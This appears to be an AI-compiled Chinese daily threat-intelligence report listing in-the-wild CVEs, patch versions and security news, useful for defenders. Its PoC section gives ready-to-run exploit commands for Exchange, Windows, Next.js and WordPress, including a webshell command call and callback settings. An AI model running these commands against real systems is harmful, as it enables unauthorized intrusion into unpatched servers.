每日安全情报报告
由 AI 整理发布
覆盖近 48 小时新增高危漏洞、公开 PoC 与安全情报文章(数据截至 2026-09-17)
风险等级:🔴 严重 | 🟠 高危 | 🟡 中危 | 🟢 低危
一、最新高危漏洞
本期重点:CISA 于 2026-09-16 一次性将 3 枚在野漏洞纳入 KEV 目录(Cisco ISE、Acronis Backup、Google Pixel),均设 2026-09-19 为联邦修复截止日,建议所有组织优先处置。
🔴 严重 · 近 24--48 小时新增 / 在野利用
1. CVE-2026-76460 --- Cisco ISE / ISE-PIC 认证绕过(CVSS 10.0)
- 漏洞类型:API 权限滥用 / 认证绕过(CWE-648)
- 受影响组件:Cisco Identity Services Engine (ISE) 3.1--3.5 各补丁版本、Cisco ISE Passive Identity Connector (ISE-PIC) 3.4.0 / 3.5.0
- CVSS :
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H= 10.0 - 在野状态 :✅ CISA KEV 于 2026-09-16 收录,截止 2026-09-19;Cisco 称源于 TAC 工单中发现的真实入侵,成功利用可获 root 命令执行
- 修复版本:ISE 3.1→Patch 12 / 3.2→Patch 11 / 3.3→Patch 12 / 3.4→Patch 7 / 3.5→Patch 4
- 链接 :NVD 详情 · CISA KEV 记录 · Cisco 官方公告
2. CVE-2026-87886 --- Acronis Backup(cPanel/WHM & Plesk)本地提权(CVSS 7.8)
- 漏洞类型:默认权限不当(CWE-276)本地权限提升
- 受影响组件:Acronis Backup plugin for cPanel & WHM(Linux,build < 1.9.3.1021)、Acronis Backup extension for Plesk(Linux,build < 1.8.11.638)
- CVSS :
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H= 7.8 - 在野状态 :✅ CISA KEV 2026-09-16 收录,截止 2026-09-19;Acronis 确认 cPanel/WHM 部署遭有限定向攻击
- 修复版本:cPanel/WHM → 1.9.3 HF3(build 1.9.3.1021);Plesk → 1.8.11(build 1.8.11.638)
- 链接 :NVD 详情 · CISA KEV 记录 · Acronis 安全公告 SEC-10986
3. CVE-2026-58704 --- Google Pixel 蜂窝基带不当授权提权
- 漏洞类型:权限检查绕过 / 不当授权(CWE 权限提升)
- 受影响组件:Google Pixel 系列(含受影响调制解调器固件版本)
- CVSS:厂商未公开具体分值(高危)
- 在野状态 :✅ CISA KEV 2026-09-16 收录;需升级至已修复的 Pixel 固件/安全补丁级别
- 链接 :NVD 详情 · CISA KEV 记录
4. CVE-2026-76461 --- Cisco Secure Email Gateway (SEG) SQL 注入 → root RCE
- 漏洞类型:SQL 注入(未授权远程命令执行,root)
- 受影响组件:Cisco AsyncOS for Cisco Secure Email Gateway(SEG)
- CVSS :高危(CISA KEV 2026-09-14 收录)
- 在野状态:✅ 已被在野利用;攻击者可在底层系统以 root 权限执行任意命令
- 链接 :NVD 详情 · CISA KEV 记录
🔴 严重 · 仍在野存量(持续告警,优先处置)
5. CVE-2026-81963 / CVE-2026-85880 --- 微软 9 月补丁日两枚在野零日(CVSS 7.8)
- 漏洞类型:Windows Update Stack 链接跟随提权(CVE-2026-81963)/ Windows ALPC 堆溢出提权(CVE-2026-85880)
- 受影响组件:Windows 10 / 11 / Server 2019 / 2022 / 2025 全受支持版本
- CVSS :均 7.8(本地提权至 SYSTEM)
- 在野状态 :✅ CISA KEV 2026-09-08 收录,截止 2026-09-22;9 月补丁日创纪录修复 974 个 CVE(含 2 个 0day、20+ 可蠕虫化漏洞)
- 链接 :CVE-2026-81963 NVD · CVE-2026-85880 NVD · CISA KEV 记录 · CERT.UG 分析
6. CVE-2026-85706 --- GitLab 路径穿越任意文件读(CVSS 10.0)
- 漏洞类型:路径穿越(未授权任意文件读取)
- 受影响组件:GitLab CE/EE(特定受影响版本)
- CVSS :10.0
- 在野状态 :✅ CISA KEV 2026-09-11 收录,截止 2026-09-14;已遭真实利用窃取配置文件与 SSH 密钥
- 链接 :NVD 详情 · CISA KEV 记录
7. CVE-2026-75650 --- Adobe Commerce / Magento「StyleSmuggler」未授权 RCE(CVSS 10.0)
- 漏洞类型:模板引擎特殊元素处理不当(PHP 代码注入,未授权 RCE)
- 受影响组件:Adobe Commerce、Magento Open Source、B2B
- CVSS :10.0
- 在野状态:✅ 自 2026-09-04 起在野;部署 Rust 后门 + PHP WebShell;KEV 截止 09-11
- 链接 :NVD 详情 · TheHackerNews 报道
🟠 高危 · 近期公开 PoC / 高关注
| CVE | 类型 | 受影响组件 | CVSS | 状态 | 链接 |
|---|---|---|---|---|---|
| CVE-2026-62911 | Exchange 认证绕过 → SYSTEM RCE | Microsoft Exchange 2016/2019/SE | 8.0/8.1 | 公开 PoC,约 21,899 台暴露 | NVD · MSRC |
| CVE-2026-75604 | Next.js Windows 未授权 RCE | Next.js ≥13.4 <15.5.24 / ≥16.0 <16.3.3(Windows) | 高危 | 公开 PoC | NVD · Next.js 公告 |
| CVE-2026-82329 | JFrog Artifactory 未授权管理员 | JFrog Artifactory | 9.8 | KEV 09-02 | NVD · KEV |
| CVE-2026-84869 | ConnectWise ScreenConnect 会话内任意代码执行 | ConnectWise ScreenConnect | 9.9 | KEV 09-12 | NVD · KEV |
| CVE-2026-67277 / CVE-2026-86060 | MikroTik RouterOS「MikroTrick」无认证接管 | MikroTik RouterOS | 8.8 / 9.2 | KEV 09-10 | NVD · KEV |
| CVE-2026-20079 | Cisco FMC 认证绕过 → root | Cisco Secure Firewall FMC | 10.0 | KEV 09-04 | NVD · THN |
| CVE-2026-19490 | Citrix NetScaler SAML 认证绕过 | NetScaler ADC / Gateway | 9.3 | KEV 09-04 | NVD · THN |
二、最新漏洞 PoC(含使用步骤)
⚠️ 以下 PoC 仅供授权安全测试与研究使用,运行前务必审阅代码、在隔离环境验证。
PoC 1 · CVE-2026-62911 --- Microsoft Exchange 预认证 RCE(Pwn2Own Berlin 2026 三漏洞链)
- 来源 :hypnguyen1209/CVE-2026-62911
- 原理 :滥用 MRSProxy 在 HTTP.sys 上缺少 EPA 保护的端点,通过 PetitPotam(MS-EFSR) 中继机器账户 NTLM,利用
IMailbox_Config6任意路径写入 ASPX WebShell,获 SYSTEM。 - 使用步骤 :
bash git clone https://github.com/hypnguyen1209/CVE-2026-62911.git cd CVE-2026-62911 pip install impacket pysocks # 仅检测 MRSProxy 是否暴露(无需凭据) python3 exploit.py --check-only -t 192.168.1.10 -e 192.168.1.11 -l 192.168.1.100 # 完整利用(-t 触发机 -e 目标机 -l 监听机) python3 exploit.py -t 192.168.1.10 -e 192.168.1.11 -l 192.168.1.100 # 验证 WebShell 落地 curl -sk "https://192.168.1.10/aspnet_client/system_web/shell.aspx?cmd=whoami+/all" - 参考 :ZDI Pwn2Own Berlin 2026 Day 2 · MBBank VRED 分析
PoC 2 · CVE-2026-20817 --- Windows Error Reporting (WER) ALPC 本地提权
- 来源 :oxfemale/CVE-2026-20817
- 原理 :WER 服务
SvcElevatedLaunch(0x0D) 未校验调用者权限,通过共享内存注入命令行,以 SYSTEM 启动WerFault.exe。 - 使用步骤 :
bash git clone https://github.com/oxfemale/CVE-2026-20817.git cd CVE-2026-20817 # 使用 Visual Studio 开发者命令提示符编译 cl /EHsc CVE-2026-20817_PoC.cpp # 在低权限账户下运行,验证提权至 SYSTEM CVE-2026-20817_PoC.exe - 说明:该漏洞已于 2026 年 1 月补丁修复;受影响系统为未打 1 月补丁的 Win10/11/Server 2019/2022。
PoC 3 · CVE-2026-75604 --- Next.js(Windows)未授权 RCE
- 来源 :rafabd1/CVE-2026-75604-poc
- 原理:Windows 平台同时启用 Pages Router 与 App Router(无 Cache Components)的 Next.js 应用,通过缓存路径构造实现未授权远程命令执行。
- 使用步骤 :
bash git clone https://github.com/rafabd1/CVE-2026-75604-poc.git cd CVE-2026-75604-poc python -m pip install -r requirements.txt # 对目标发起利用(回调地址需目标可达) python poc.py --target http://TARGET:3000 \ --callback-ip CALLBACK_IP \ --pages-cache-path /pages-cache/seed \ --app-cache-path /app-cache/seed - 受影响版本 :Next.js
>=13.4 <15.5.24或>=16.0 <16.3.3(需原生 Windows 部署)。 - 参考 :Next.js 安全公告 GHSA-p293-qw3h-jr36
PoC 4 · wp2shell --- CVE-2026-63030 + CVE-2026-60137(WordPress 核心未授权 RCE)
- 来源 :0xsha/wp2shell
- 原理 :CVE-2026-63030(REST 批量路由混淆)绕过类型校验,触发 CVE-2026-60137(
WP_QuerySQL 注入),实现「未登录 → 创建管理员 → 植入 WebShell」全链。 - 使用步骤 :
bash git clone https://github.com/0xsha/wp2shell.git cd wp2shell # 仅标准库,无需第三方依赖;Python 3.7+ # 非破坏性检测 ./wp2shell.py check https://target # 执行 RCE(自动创建管理员并上传 WebShell) ./wp2shell.py shell https://target --cmd id # 批量扫描 ./wp2shell.py scan https://target --prove - 参考 :wp2shell README
三、网络安全最新文章
-
Google 发布 Chrome 153 安全更新,修复 42 个漏洞含 3 个严重级
摘要:Chrome 153 修复 42 个漏洞,其中 3 个严重级(CVE-2026-91726 WebGL 越界读取、CVE-2026-91721 Internals UAF、CVE-2026-91749 Workers UAF),建议用户与企业尽快更新。
-
全球网络安全速递:微软 974 个漏洞补丁反致故障,紧急补救
摘要:微软 9 月补丁日修复 974 个 CVE 创纪录,却引发 RDS、Hyper-V、USB 音频故障并发布带外紧急更新;GitLab 满分漏洞 CVE-2026-85706 已被在野利用,月费 250 美元的 VectraRAT 浮现,疑似朝鲜 APT 借 HAProxy 后门攻击韩国媒体与汽车业。
来源:阅读原文(CN-SEC)
-
FreeBuf 周报:首个利用微信通话实现「0 交互入侵」的蠕虫 WeWorm 出现;DeepSeek Harness 曝高危漏洞
摘要:WeWorm 经微信通话跨 iOS/Android 传播、无需接听数秒接管账号(腾讯已修复);DeepSeek Harness 高危漏洞可让 Agent 关闭文件沙箱、绕过批准;另含微软 974 CVE 补丁、ChatGPT 沙箱跨账户窃密等热点。
-
CISA 将 Cisco、Citrix、Fortinet 在野漏洞纳入 KEV,设 9/12 联邦修复截止
摘要:Cisco FMC 认证绕过(CVE-2026-20079,CVSS 10.0,已确认 3 个威胁集群利用)、Citrix NetScaler SAML 绕过(CVE-2026-19490,CVSS 9.3)、Fortinet FortiOS 堆溢出(CVE-2025-25249)遭在野利用,其中 FortiOS 被用于将 PivotC2 RAT 投放至 178 台设备。
-
N-able N-central 预认证 RCE(CVE-2026-86218,CVSS 10.0)已被在野利用
摘要:CISA 将 N-able N-central 静态代码注入漏洞纳入 KEV(截止 9/11),watchTowr 已复现;可串联 CVE-2026-86206/86207 绕过认证创建管理员账户。
-
Adobe 修复 Magento 零日「StyleSmuggler」(CVE-2026-75650,CVSS 10.0)
摘要:Adobe Commerce / Magento 模板引擎注入导致未授权 RCE,自 9/4 起在野,部署 Rust 后门与 PHP WebShell;蜜罐记录到中、罗两国 IP 利用尝试。
部分内容由 AI 辅助生成